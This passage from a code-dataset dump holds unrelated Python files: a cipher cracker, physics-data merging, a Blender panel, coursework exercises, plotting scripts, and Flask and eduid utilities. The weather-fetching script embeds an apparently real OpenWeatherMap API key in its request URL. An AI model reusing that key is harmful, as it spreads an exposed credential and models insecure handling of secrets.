So to decode, all we have\n to do is convert l[index] -> general_frequency[index]\n \"\"\"\n\n # initialize empty return string\n newText = \"\"\n # iterate over every character in the file\n for cur in range(len(text)):\n # if the character is alphabetical\n if text[cur].isalpha():\n try:\n # attempt to find the index of that letter in our sorted array\n frequency_index = input_frequency.index(text[cur])\n # in our return text, return the *decoded* character with the same index\n newText += general_frequency[frequency_index]\n except:\n # if that fails, the character is either not a letter or there's an issue\n # with the mapping indices, in which case the original character is maintained\n newText += text[cur]\n else:\n # if the character is for sure not a letter, don't change it\n newText += text[cur]\n\n # return the *mostly or completely* decoded string\n return newText\n\n\nif __name__ == \"__main__\":\n print(file_decode(\"applications/crack_caesar/ciphertext.txt\"))\n","sub_path":"applications/crack_caesar/crack_caesar.py","file_name":"crack_caesar.py","file_ext":"py","file_size_in_byte":3527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"560630798","text":"#!/bin/python\n# import ROOT in batch mode\nimport sys\nimport re\nimport argparse\noldargv = sys.argv[:]\nsys.argv = [ '-b-' ]\nimport ROOT\nROOT.gROOT.SetBatch(True)\nsys.argv = oldargv\n\n# ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ----\n\nclass customAction(argparse.Action):\n def __call__(self, parser, args, values, option_string=None):\n setattr(args, self.dest, values.split(','))\n\ndef get_comma_separated_args(self, arg_line):\n return arg_line.split(',')\n\n# ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ----\n\n# Load the CalibrationFile format\nROOT.gSystem.Load(\"lib/H4Dict.so\")\n\ntrees={}\nmergedFile = ROOT.TFile(sys.argv[1], \"RECREATE\")\nheadFile = ROOT.TFile(sys.argv[2], \"READ\")\nheadFile.cd()\ntrees[\"h4\"]=ROOT.TChain(\"h4\", \"main_h4reco_tree\") \nnextKey = ROOT.TIter(ROOT.gDirectory.GetListOfKeys())\n \nwhile True:\n key = nextKey()\n if key == nextKey.End()():\n break\n ## keep only the highest cycle number for each key and only TTree keys \n obj = key.ReadObj()\n if obj.IsA().GetName() == \"TTree\":\n trees[key.GetName()]= ROOT.TChain(key.GetName(), key.GetTitle())\n trees[key.GetName()].SetDirectory(0)\n else:\n mergedFile.cd()\n obj.Write(key.GetName()) \n\nfor filename in sys.argv[2:]:\n for tree_name in trees:\n trees[tree_name].AddFile(filename)\n\nfor tree_name in trees:\n if tree_name == \"h4\" or tree_name == \"wf\":\n continue\n mergedFile.cd()\n trees[tree_name].Merge(mergedFile, 0, \"keep\")\n trees[tree_name].BuildIndex(\"index\")\n trees[\"h4\"].AddFriend(tree_name)\n\nmergedFile.cd()\ntrees[\"h4\"].BuildIndex(\"index\")\ntrees[\"h4\"].Merge(mergedFile, 0, \"keep\")\n\nmergedFile.Close()\n","sub_path":"scripts/merger.py","file_name":"merger.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"265385098","text":"# Copyright Wuguyannian All Rights Reserved.\r\n\r\nimport bpy\r\nfrom ..functions import utilities\r\n\r\nclass UE_SKELETON_PT_Panel(bpy.types.Panel):\r\n \"\"\"\r\n This class defines the user interface for the panel in the tab in the 3d view\r\n \"\"\"\r\n bl_label = 'UE Skeleton Toolkit'\r\n bl_space_type = 'VIEW_3D'\r\n bl_region_type = 'UI'\r\n bl_category = 'UE 
Skeleton'\r\n\r\n    def draw(self, context):\r\n        \"\"\"\r\n        This function overrides the draw method in the Panel class. The draw method is the function that\r\n        defines the user interface layout and gets updated routinely.\r\n\r\n        :param object context: The 3d view context.\r\n        \"\"\"\r\n\r\n        properties = bpy.context.window_manager.ueskeleton\r\n\r\n        # set source skeleton name to the object picker\r\n        object_picker = utilities.get_picker_object().constraints[0]\r\n        if object_picker.target:\r\n            if properties.source_skeleton_name != object_picker.target.name:\r\n                properties.source_skeleton_name = object_picker.target.name\r\n        else:\r\n            if properties.source_skeleton_name != '':\r\n                properties.source_skeleton_name = ''\r\n\r\n        layout = self.layout\r\n\r\n        # source skeleton selector\r\n        box = layout.box()\r\n        row = box.row()\r\n        row = row.split(factor=0.90, align=True)\r\n        row.prop(object_picker, 'target', text='Source')\r\n\r\n        # enable the layout if an armature is selected\r\n        validate_results = utilities.validate_source_skeleton_object(properties)\r\n        layout = layout.column()\r\n        layout.enabled = validate_results[0]\r\n\r\n        if validate_results[1] and not layout.enabled:\r\n            row = layout.row()\r\n            row.alert = True\r\n            row.label(text='This is not a skeleton object!')\r\n\r\n        # apply the root rotation\r\n        if layout.enabled and not utilities.validate_source_skeleton_rotation(properties):\r\n            row = layout.row()\r\n            row.alert = True\r\n            row.label(text='You need to apply the rotation!')\r\n\r\n        # template dropdown\r\n        row = layout.row()\r\n        row.label(text='Template:')\r\n        if properties.selected_skeleton_template in [properties.default_template]:\r\n            row = layout.row()\r\n            row.prop(properties, 'selected_skeleton_template', text='')\r\n        else:\r\n            row = layout.split(factor=0.90, align=True)\r\n            row.prop(properties, 'selected_skeleton_template', text='')\r\n            row.operator('ueskeleton.remove_template_folder', icon='PANEL_CLOSE')\r\n\r\n        box = layout.box()\r\n        row = box.row()\r\n        row.scale_y = 2.0\r\n        row.operator('ueskeleton.convert_to_epic_skeleton', text='Convert')","sub_path":"ui/view_3d.py","file_name":"view_3d.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"556293749","text":"print(\"show the square, triple and quadruple of three numbers\")\n\nn1 = int(input(\"enter a number: \"))\nn2 = int(input(\"enter another number: \"))\nn3 = int(input(\"enter the third number: \"))\n\nquadrado = n1 * n1\ntriplo = n2 * 3\nquartuplo = n3 * 4\n\nprint(\"square of the first number: \" + str(quadrado))\nprint(\"triple of the second number: \" + str(triplo))\nprint(\"quadruple of the third number: \" + str(quartuplo))\n","sub_path":"jacivan033/questao2.py","file_name":"questao2.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"235646747","text":"'''\nIvan Leon\nAdvent of Code\nwww.adventofcode.com\nDay 1 Part 2\n'''\n# Takes in input file name and returns list of instructions\ndef readInput(filename):\n    f = open(filename, 'r')\n    f = f.readlines()[0].split(', ')\n\n    temp = []\n    for i in f:\n        turn = i[0]\n        amount = int(i[1:len(i)])\n        inst = [turn, amount]\n        temp.append(inst)\n\n    return temp\n\n\ndef turnRight(amount, position):\n    pos = position\n    if pos[2] == 3:\n        pos[2] = 0\n    elif pos[2] < 3:\n        pos[2] += 1\n\n    # 0 -> North | 1 -> East\n    # 2 -> South | 3 -> West\n\n    if pos[2] == 0:\n        pos[1] += amount\n    elif pos[2] == 1:\n        pos[0] += amount\n    elif pos[2] == 2:\n        pos[1] -= 
amount\n elif pos[2] == 3:\n pos[0] -= amount\n\n return pos\n\ndef turnLeft(amount, position):\n pos = position\n if pos[2] == 0:\n pos[2] = 3\n elif pos[2] > 0:\n pos[2] -= 1\n\n # 0 -> North | 1 -> East\n # 2 -> South | 3 -> West\n\n if pos[2] == 0:\n pos[1] += amount\n elif pos[2] == 1:\n pos[0] += amount\n elif pos[2] == 2:\n pos[1] -= amount\n elif pos[2] == 3:\n pos[0] -= amount\n\n return pos\n\n\n\n\nif __name__ == '__main__':\n position = [0,0,0]\n SOLUTION = []\n\n\n instructions = readInput('input.txt')\n locations = []\n print(len(locations))\n\n for step in instructions:\n if len(locations) == 0:\n # continue\n # print(\"FUCK\")\n pass\n else:\n for p in locations:\n # print(\"this\")\n if p == position:\n SOLUTION = position\n dist = abs(SOLUTION[0]+SOLUTION[1])\n print(\"Easter Bunny HQ is at: (\",SOLUTION[0],\",\",SOLUTION[1],\")\" )\n\n\n\n if step[0]=='R':\n # turn right\n for i in range(0,step[1]):\n locations.append(position)\n position = turnRight(1, position)\n else:\n # turn left\n for i in range(0,step[1]):\n locations.append(position)\n position = turnLeft(1, position)\n\n\n # SOLUTION\n # print(position)\n # print(position[0]+position[1])\n\n\n\n\n\n","sub_path":"AoC_01_Taxicab/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"339870989","text":"from __future__ import division # for python2 only\n\nimport numpy as np\nimport math\nimport sys\n\n## Need to modify: 0.0 to ??\nlambda_parameter=0.0\n##\n\n## import data\n\nLabel_column=2\n\nTrain = np.loadtxt(\"train.txt\",delimiter=\",\")\ntheta_0_append = np.c_[[1.0] * len(Train.T[0]),Train]\nX = np.delete(theta_0_append,-1,1)\nY = Train[:,Label_column]\n\nTest = np.loadtxt(\"test.txt\",delimiter=\",\")\ntheta_0_append_test = np.c_[[1.0] * len(Test.T[0]),Test]\nX_test = np.delete(theta_0_append_test,-1,1)\nY_test = Test[:,Label_column]\n\n## scaling\nXT = X.T\nfor h in range(len(XT)):\n x = XT[h]\n mean = np.mean(x)\n max = x[np.where(np.amax(x) == x)[0][0]]\n min = x[np.where(np.amin(x) == x)[0][0]]\n r = (max - min) / 2\n if r != 0:\n XT[h] = (XT[h] - mean) / r\n \n\nXT_test = X_test.T\nfor h2 in range(len(XT_test)):\n XT_test[h2] = (XT_test[h2] - mean) / r\n\nfor l in range(0, 100):\n ## gradient decent\n m = len(X)\n n = len(X[0])\n th = np.zeros(n)\n\n alpha = 0.1\n achange = 1.0\n steps = 0\n lambda_parameter = l / 1.0\n\n while achange > 0.0001:\n change = 0.0\n steps += 1\n\n for i in range(m): # training samples\n x = X[i]\n y = Y[i]\n for j in range(n): #features\n theta = th[j]\n \n # j=0\n if j == 0:\n j_th = (1/m) * ((1/(1+np.exp(-np.dot(x,th.T))))-y) * x[j]\n # j>=1\n else:\n sigmoid = 1/(1+np.exp(-np.dot(x,th.T)))\n j_th = (1/m) * ((1/(1+np.exp(-np.dot(x,th.T))))-y) * x[j] + (lambda_parameter/m) * th[j]\n \n new_theta = theta - alpha * j_th\n change += new_theta - theta\n th[j] = new_theta\n achange = math.fabs(change)\n #print(steps,change, end='\\r')\n #print(steps,change)\n\n ## classification \n\n ## closed accuracy\n Hypo=np.array(1/(1+np.exp(-np.dot(X,th.T))))\n\n true=0\n n=0\n\n for k in range(m):\n n += 1\n if (Hypo[k] >= 0.5 and Y[k] == 1) or (Hypo[k] < 0.5 and Y[k] == 0):\n true += 1\n\n #print(\"Closed Accuracy:\",true/n)\n\n ## open accuracy\n\n Hypo_test=np.array(1/(1+np.exp(-np.dot(X_test,th.T))))\n\n true_test=0\n n_test = 0\n m_test = len(X_test)\n\n for k2 in range(m_test):\n n_test += 1\n if (Hypo_test[k2] >= 0.5 and Y_test[k2] == 1) or (Hypo_test[k2] < 
0.5 and Y_test[k2] == 0):\n true_test += 1\n \n #print(\"Open Accuracy:\",true_test/n_test)\n\n print(lambda_parameter, '\\t', true/n, '\\t', true_test/n_test)\n","sub_path":"4_regularization/Reguralized_LR/reguralized_LR.py","file_name":"reguralized_LR.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"584124442","text":"# a simple event framework so we can connect together decoupled logic\nfrom lemon_pi.shared.events import Event\n\n# the car is moving\nMovingEvent = Event(\"Moving\", suppress_logs=True)\n\n# the car is not moving\nNotMovingEvent = Event(\"NotMoving\", suppress_logs=True)\n\n# the car is exiting the race track and entering the pits\nLeaveTrackEvent = Event(\"LeaveTrack\", debounce_time=30)\n\n# the car is entering the race track\nEnterTrackEvent = Event(\"EnterTrack\", debounce_time=30)\n\n# a lap has been completed\n# lap_count= int\n# lap_time= float\nCompleteLapEvent = Event(\"CompleteLap\")\n\n# a request to exit the application\nExitApplicationEvent = Event(\"ExitApplication\")\n\n# the car should transmit status on radio\nRadioSyncEvent = Event(\"RadioSync\", debounce_time=30)\n\n### State Change Events\n\n# the car is setting off from pits\nStateChangeSettingOffEvent = Event(\"StateChangeSettingOff\", debounce_time=10)\n\n# the car is parked in the pits\nStateChangePittedEvent = Event(\"StateChangePitted\")\n\n### OBD Events\nOBDConnectedEvent = Event(\"OBD-Connected\")\nOBDDisconnectedEvent = Event(\"OBD-Disconnected\")\n\n### GPS Events\nGPSConnectedEvent = Event(\"GPS-Connected\")\nGPSDisconnectedEvent = Event(\"GPS-Disconnected\")\n\n### Refuel event\n# percent_full=\nRefuelEvent = Event(\"Refuel\")\n\n### Car has come to a halt\nCarStoppedEvent = Event(\"CarStopped\", suppress_logs=True, debounce_time=10)\n\n########## Incoming Radio Events\n\n# emit() will contain\n# text=\n# duration_secs=\nDriverMessageEvent = Event(\"driver-message\")\n\n# emit() will contain\n# text=\nDriverMessageAddendumEvent = Event(\"driver-message-addendum\")\n\n# emit() will contain\n# flag=(GREEN|YELLOW|RED|BLACK|UNKNOWN)\nRaceFlagStatusEvent = Event(\"flag-status\")\n\n# emit() will contain\n# lap_count=\n# ts=\nLapInfoEvent = Event(\"lap-info\")\n\n#\nRadioReceiveEvent = Event(\"radio-rx\")\n\n# This wraps an initial event, unleashed by the button push\n# event=\n# button=0 the id of the button that was pushed\nButtonPressEvent = Event(\"btn\", debounce_time=0.25)\n\n# an audio alarm\n# message=\nAudioAlarmEvent = Event(\"alrm\", debounce_time=60)\n\n# an event indicating the cars position in the race\n# pos=\n# pos_in_class=\n# car_ahead=\n# gap=\nRacePositionEvent = Event(\"rpos\")\n\n\n\n\n","sub_path":"lemon_pi/car/event_defs.py","file_name":"event_defs.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"370656755","text":"# 1) Nested List\n''' result = []\n\n\ndef single_list(nestedlist):\n for value in nestedlist:\n if isinstance(value, list):\n single_list(value)\n else:\n result.append(value)\n\n\nnestedlist = [[1, 2], [3], [[[4, 5, 6]]]]\nsingle_list(nestedlist)\nprint(result) '''\n\n# ----------------------------------------------------\n# 2) Nested Dictionary\nresult_list = []\n\n\ndef true_value(nesteddict):\n for key, val in nesteddict.items():\n # print(\"key is \", key, 'value is ', val)\n if isinstance(val, dict):\n # print(\"inside isinstance :\", val)\n 
true_value(val)\n        else:\n            if val is True:\n                result_list.append(key)\n        # if val.values():\n        #     print(\"one more inside :\", val.values())\n        #     true_value(val)\n        # elif val.values() == True:\n        #     print(\"true values are\", val.keys)\n        # else:\n        #     res = result_list.append(val)\n        #     return res\n\n\nnested_dict = {\n    'user': {'add': False, 'delete': True},\n    'product': {'add': True, 'delete': False}\n}\n\n# def true_value(nesteddict):\n#     for key, val in nesteddict.items():\n#         print(key, val)\n#         if val:\n#             answer = '{}{}'.format(key,val)\n#             q =result_list.append(answer)\n#\n#     return q\n#\n# nesteddict = {'add': False, 'delete': True,'formmatt':True}\n# true_value(nesteddict)\n# print(result_list)\ntemp_list = []\n\n\ndef parser(data, k=None):\n    for key, value in data.items():\n        if isinstance(value, dict):\n            parser(value, key)\n        elif value is True:\n            parsed_key = '{}_{}'.format(k, key)\n            temp_list.append(parsed_key)\n\n\n# for key, value in nested_dict.items():\n#     for key1, value1 in value.items():\n#         if value1 is True:\n#             parsed_key = '{}_{}'.format(key, key1)\n#             temp_list.append(parsed_key)\n# parser(data=nested_dict)\n# print(temp_list)\n\n\nsearch_dict = {\n    'user1': {'address': ['banashankari', 'test'], 'number': 123456},\n    'user2': {'address': ['marathalli', 'test'], 'number': 456787},\n    'user3': {'address': ['mara', 'tera'], 'number': 456787},\n    'user4': {'address': ['para', 'mara'], 'number': 456787}\n\n}\n\n\n# solution by nishant\n# def search_params(data, param, value):\n#     result_list2 = []\n#     for k, v in data.items():\n#         if data[k][param] is value:\n#             result_list2.append(k)\n#     return result_list2\n# print(search_params(search_dict, 'number', 123456))\n\n# vivek\n\ndef search_params(data, param, value):\n    result_list3 = []\n    for key, val in data.items():\n        # print(\"for: \", data[key][param])\n        for list_parse in data[key][param]:\n            # print(\"for1: \", list_parse)\n            if list_parse == value:\n                # print(\"list_parse:\", list_parse, \"value:\", value)\n                result_list3.append(key)\n    return result_list3\n\n\nprint(search_params(search_dict, 'address', value='para'))\n","sub_path":"newproject2_ecomm/src/ecommerce/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"556941038","text":"# File: max.py\n# Author: Jesse Ponugoti\n# NSID: vip670\n# Student ID: 11220274\n# Course: CMPT 145 L12\n\ndef maximum(lst):\n\t\"\"\"\n\tPurpose\n\t  Recursively find the max value in a list\n\tPre-conditions:\n\t  :param lst: a list with integers\n\tPost-conditions:\n\t\tNone\n\tReturn:\n\t\tThe max value in the input list of integers\n\t\"\"\"\n\tdef maximum1(lst):\n\t\tif len(lst) == 1:\n\t\t\treturn lst[0]\n\t\tm = maximum1(lst[1:])\n\t\treturn m if m > lst[0] else lst[0]\n\n\tdef maximum2(lst):\n\t\trest = len(lst)//2\n\t\tm1 = maximum(lst[:rest])\n\t\tm2 = maximum(lst[rest:])\n\t\treturn m1 if m1 > m2 else m2\n\n\tif len(lst) == 1:\n\t\treturn lst[0]\n\telse:\n\t\treturn maximum2(lst)\n\n\nlst = [1,2,3,4,5,6,7,8,9,10]\nprint('max of', lst, 'is', maximum(lst))\n\n","sub_path":"labs/lab5/max.py","file_name":"max.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"633483114","text":"#!/usr/bin/env python\n\"\"\"This module creates an empty canvas for the exam.\"\"\"\nfrom functools import partial\n\nfrom matplotlib.ticker import MaxNLocator\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\n# We want to show the shape and 
population differences in the cost functions.\ndef cost_education(group, y):\n \"\"\"This function calculates the cost of education.\"\"\"\n if group in ['high']:\n cost = 2 / 3 * y\n else:\n cost = y\n return cost\n\n\ndef benefit_education(y_star, y):\n \"\"\"This function calculates the benefit of education.\"\"\"\n if y < y_star:\n benefit = 1.0\n else:\n benefit = 2.0\n return benefit\n\n\ndef unconditional_expected_marginal_product(q):\n \"\"\"This function calculates the unconditional expected marginal product.\"\"\"\n return 2.0 - q\n\n\ndef surplus_education(group, y_star, y):\n \"\"\"This function calculates the surplus from education.\"\"\"\n cost = cost_education(group, y)\n bene = benefit_education(y_star, y)\n return bene - cost\n\n\ndef align_plots(ax, ylabel, xlim=[0, 3], ylim=[0, 3], y_star=1.5):\n ax.set_xlabel('Education')\n ax.set_ylabel(ylabel)\n ax.set_xlim(*xlim)\n ax.set_ylim(*ylim)\n\n if y_star is not None:\n ax.axvline(y_star, color='lightgrey', linestyle='--')\n ax.text(y_star - 0.05, ylim[0] - 0.175, r'$y^*$')\n\n ax.yaxis.get_major_ticks()[0].set_visible(False)\n ax.yaxis.set_major_locator(MaxNLocator(integer=True))\n ax.xaxis.set_major_locator(MaxNLocator(integer=True))\n\n return ax\n\ndef plots_market_structure(y_star):\n \"\"\"This function plots the graphs for the analysis of the market structure.\"\"\"\n\n for is_canvas in [False, True]:\n\n ax = plt.figure().add_subplot(111)\n ax.set_xlabel(r'$q_L$')\n ax.set_ylabel('Surplus')\n ax.set_xlim([0, 1])\n ax.set_ylim([0, 3])\n\n if not is_canvas:\n\n fname = 'fig-introduction-spence-market-structure.png'\n ax.set_xticks([0, 0.5, 1])\n\n surplus_analysis = partial(surplus_education, 'high', y_star)\n surplus_analysis = np.vectorize(surplus_analysis)\n y_values = surplus_analysis(np.tile(y_star, 1000))\n ax.plot(x_values, y_values, label='high productivity')\n\n surplus_analysis = partial(surplus_education, 'low', y_star)\n surplus_analysis = np.vectorize(surplus_analysis)\n y_values = surplus_analysis(np.tile(0, 1000))\n ax.plot(x_values, y_values, label='low productivity')\n\n y_values = unconditional_expected_marginal_product(x_values)\n ax.plot(x_values, y_values, label='no-signalling wage')\n ax.axvline(5/6, color='lightgrey', linestyle='--')\n\n else:\n\n fname = 'fig-introduction-spence-market-structure-canvas.png'\n ax.set_xticks([0, 0.5, 1])\n\n ax.yaxis.get_major_ticks()[0].set_visible(False)\n ax.yaxis.set_major_locator(MaxNLocator(integer=True))\n ax.legend()\n\n plt.savefig(fname)\n\n\ndef plots_surplus(y_star):\n \"\"\"This function plots the graphs for the analysis of the group surpluses.\"\"\"\n for is_canvas in [True, False]:\n\n ax = plt.figure().add_subplot(111)\n\n if is_canvas:\n ax = align_plots(ax, 'Surplus', ylim=[-2, 2], y_star=None)\n fname = 'fig-introduction-spence-surplus-canvas.png'\n\n else:\n ax = align_plots(ax, 'Surplus', ylim=[-2, 2], y_star=y_star)\n fname = 'fig-introduction-spence-surplus.png'\n\n y_values = dict()\n for group in ['low', 'high']:\n surplus_analysis = partial(surplus_education, group, y_star)\n surplus_analysis = np.vectorize(surplus_analysis)\n\n y_values[group] = surplus_analysis(x_values)\n\n x_values_ma = np.ma.masked_where(\n (x_values < y_star + 0.005) & (x_values > y_star - 0.005),\n x_values)\n\n ax.plot(x_values_ma, y_values[group], label=group + ' productivity')\n\n ax.legend()\n\n plt.savefig(fname)\n\n\nif __name__ == '__main__':\n\n x_values = np.linspace(0, 3, 1000)\n\n ax = plt.figure().add_subplot(111)\n ax = align_plots(ax, 'Cost', 
y_star=1.25)\n\n    y_values = dict()\n    linestyles = [':', '-']\n\n    for i, group in enumerate(['low', 'high']):\n        benefit_analysis = partial(cost_education, group)\n        benefit_analysis = np.vectorize(benefit_analysis)\n\n        y_values[group] = benefit_analysis(x_values)\n\n        ax.plot(x_values, y_values[group], label=group + ' productivity', linestyle=linestyles[i])\n\n    ax.yaxis.get_major_ticks()[0].set_visible(False)\n    ax.legend(fontsize=25)\n    plt.savefig('fig-introduction-spence-cost.png')\n\n    ax = plt.figure().add_subplot(111)\n    ax = align_plots(ax, 'Wage', y_star=1.25)\n\n    y_star, y_values = 1.25, dict()\n    benefit_analysis = partial(benefit_education, y_star)\n    benefit_analysis = np.vectorize(benefit_analysis)\n\n    y_values[group] = benefit_analysis(x_values)\n    x_values_ma = np.ma.masked_where((x_values < 1.255) & (x_values > 1.2495), x_values)\n\n    ax.plot(x_values_ma, y_values[group])\n\n    plt.savefig('fig-introduction-spence-benefit.png')\n\n    # This is the material for the question on market structure.\n    y_star = 1.25\n    plots_market_structure(y_star)\n\n    # This is the material for the question on the surplus.\n    y_star = 1.25\n    plots_surplus(y_star)\n","sub_path":"tutorial/figures/fig-introduction.py","file_name":"fig-introduction.py","file_ext":"py","file_size_in_byte":5433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"72997833","text":"from app import app\nfrom flask import request, jsonify, render_template\nfrom app import lib\n\n\n@app.route('/', methods=[\"GET\", \"POST\"])\ndef index():\n    # assign \"bio\" request variable\n    if request.method == \"GET\":\n        bio = request.args.get(\"bio\")\n    elif request.method == \"POST\":\n        bio = request.form[\"bio\"]\n    else:\n        return jsonify(error=\"Invalid request method\"), 400\n\n    # check that the request variable exists\n    if bio is None:\n        return jsonify(error=\"Biology text should be submitted as \\\"bio\\\" request variable\"), 400\n\n    # translate it!\n    bio_lower = lib.translate(bio)\n\n    # return it\n    context = {\n        \"bio\": bio,\n        \"eng\": bio_lower\n    }\n    return jsonify(**context)\n\n\n@app.route('/example/')\ndef example():\n    return render_template('example.html')\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"636544151","text":"#!/usr/bin/env python\n# encoding: utf-8\n# @author: liusir\n# @file: re_demo_17.py\n# @time: 2020/9/20 5:01 PM\n\nimport re\n\n# the re module: 1. meaning of the pattern characters  2. its methods are rather scattered\n\n# approach 1: match with the re module's functions\nsource_str = 'python3classggfdgfdgfderewrwe'\nvalue = re.search( 'python\\d',source_str ).group()\nprint( value )\n\n# approach 2: use a compiled regular expression object\nreg_obj = re.compile('python\\d')\nvalue1 = reg_obj.search(source_str).group()\nprint( value1 )\n\ntitle_str = '新梦想_软件测试培训_Java培训_Python培训_长沙新梦想IT教育'\nreg_obj_01 = re.compile('t+')\nresult = reg_obj_01.findall(title_str)\nprint( result )\n\nresult1 = re.findall('(.+?)',title_str)[0]\nprint( result1 )\n\n\n\n\n\n\n\n","sub_path":"courest_pritices/20200920/re_demo_17.py","file_name":"re_demo_17.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"537568981","text":"from threading import Thread\r\nimport json\r\nimport requests\r\nimport datetime\r\n\r\nclass WeatherGetter(Thread):\r\n    def __init__(self, city):\r\n        Thread.__init__(self)\r\n        self.city = city\r\n    \r\n    def cityLocator(self):\r\n        self.loc = 'https://www.google.co.uk/maps/place/'+ 
self.lon + self.lat\r\n\r\n def writeToFile(self):\r\n fout = open('weather.txt','a')\r\n daymon = datetime.datetime.now().strftime(\"%d %b \")\r\n timenow = datetime.datetime.now().strftime(\"%H:%M\")\r\n stamp = daymon + timenow\r\n text = '\\n{}: {}\\n'.format(self.city.title(),self.loc)\r\n text += '[{}] Weather is {}. Temperature is {}C feels like {}C with a windspeed of {}mph'.format(stamp, self.cond, self.temp, self.feel, self.wspd)\r\n print(text, file=fout)\r\n fout.close()\r\n\r\n def run(self):\r\n url = 'https://api.openweathermap.org/data/2.5/weather?q=' + self.city + '&units=metric&APPID=48f2d5e18b0d2bc50519b58cce6409f1'\r\n res = requests.get(url)\r\n #print (res.text)\r\n data = json.loads(res.text)\r\n\r\n self.lon = data['coord']['lon']\r\n self.lat = data['coord']['lat']\r\n self.loc = 'https://www.google.co.uk/maps/place/' + str(self.lon) + ',' + str(self.lat)\r\n\r\n self.temp = data['main']['temp']\r\n self.feel = data['main']['feels_like']\r\n self.cond = data['weather'][0]['description']\r\n self.wspd = data['wind']['speed']\r\n\r\n self.writeToFile()\r\n\r\nif __name__ == '__main__':\r\n cities = ['athlone','belfast','cork','dublin','edenderry','frankfurt','galway','houston','istanbul','jakarta','kolkata','london','mumbai','nairobi','ottawa','paris','quebec']\r\n t1 = float(datetime.datetime.now().strftime(\"%S\"))\r\n for c in cities:\r\n wg = WeatherGetter(c)\r\n wg.run()\r\n t2 = float(datetime.datetime.now().strftime(\"%S\"))\r\n print('Weather data retrieved in {}sec'.format(t2-t1))","sub_path":"pybeyond/review2/weathergetter.py","file_name":"weathergetter.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"608899453","text":"# -*- coding: utf-8 -*-\n\nimport re\nfrom uuid import uuid4\nimport sys\nfrom flask import current_app, session\n\nfrom eduid_userdb import User\nfrom eduid_userdb.dashboard import DashboardUser\nfrom eduid_userdb.proofing import ProofingUser\nfrom eduid_userdb.exceptions import UserDBValueError, EduIDUserDBError\nfrom eduid_userdb.exceptions import UserDoesNotExist, MultipleUsersReturned\nfrom eduid_common.api.exceptions import ApiException\n\nPY3 = sys.version_info[0] == 3\n\nif PY3: # pragma: no cover\n text_type = str\n from io import StringIO\nelse: # pragma: no cover\n text_type = unicode\n from StringIO import StringIO\n\n\ndef get_unique_hash():\n return text_type(uuid4())\n\n\ndef get_short_hash(entropy=10):\n return uuid4().hex[:entropy]\n\n\ndef update_modified_ts(user):\n \"\"\"\n When loading a user from the central userdb, the modified_ts has to be\n loaded from the private userdb (since it is not propagated to 'attributes'\n by the eduid-am worker).\n\n This need should go away once there is a global version number on the user document.\n\n :param user: User object from the central userdb\n :type user: eduid_userdb.User\n\n :return: None\n \"\"\"\n try:\n userid = user.user_id\n except UserDBValueError:\n current_app.logger.debug(\"User {!s} has no id, setting modified_ts to None\".format(user))\n user.modified_ts = None\n return\n \n private_user = current_app.private_userdb.get_user_by_id(userid, raise_on_missing=False)\n if private_user is None:\n current_app.logger.debug(\"User {!s} not found in {!s}, \"\n \"setting modified_ts to None\".format(user, current_app.private_userdb))\n user.modified_ts = None\n return\n\n if private_user.modified_ts is None:\n private_user.modified_ts = True # use current time\n 
current_app.logger.debug(\"Updating user {!s} with new modified_ts: {!s}\".format(\n private_user, private_user.modified_ts))\n current_app.private_userdb.save(private_user, check_sync = False)\n\n user.modified_ts = private_user.modified_ts\n current_app.logger.debug(\"Updating {!s} with modified_ts from central userdb user {!s}: {!s}\".format(\n user, private_user, private_user.modified_ts))\n\n\ndef get_user():\n \"\"\"\n :return: Central userdb user\n :rtype: eduid_userdb.user.User\n \"\"\"\n eppn = session.get('user_eppn', None)\n if not eppn:\n raise ApiException('Not authorized', status_code=401)\n try:\n # Get user from central database\n return current_app.central_userdb.get_user_by_eppn(eppn, raise_on_missing=True)\n except UserDoesNotExist as e:\n current_app.logger.error('Could not find user in central database.')\n current_app.logger.error(e)\n raise ApiException('Not authorized', status_code=401)\n except MultipleUsersReturned as e:\n current_app.logger.error('Found multiple users in central database.')\n current_app.logger.error(e)\n raise ApiException('Not authorized', status_code=401)\n\n\ndef save_and_sync_user(user):\n \"\"\"\n Save (new) user object to the private userdb and propagate the changes to the central user db.\n\n May raise UserOutOfSync exception\n\n :param user: the modified user\n :type user: current_app.private_userdb.UserClass\n \"\"\"\n if not isinstance(user, current_app.private_userdb.UserClass):\n raise EduIDUserDBError('user is not of type {}'.format(current_app.private_userdb.UserClass))\n current_app.private_userdb.save(user)\n return current_app.am_relay.request_user_sync(user)\n\n\ndef urlappend(base, path):\n \"\"\"\n :param base: Base url\n :type base: str\n :param path: Path to join to base\n :type path: str\n :return: Joined url\n :rtype: str\n\n Used 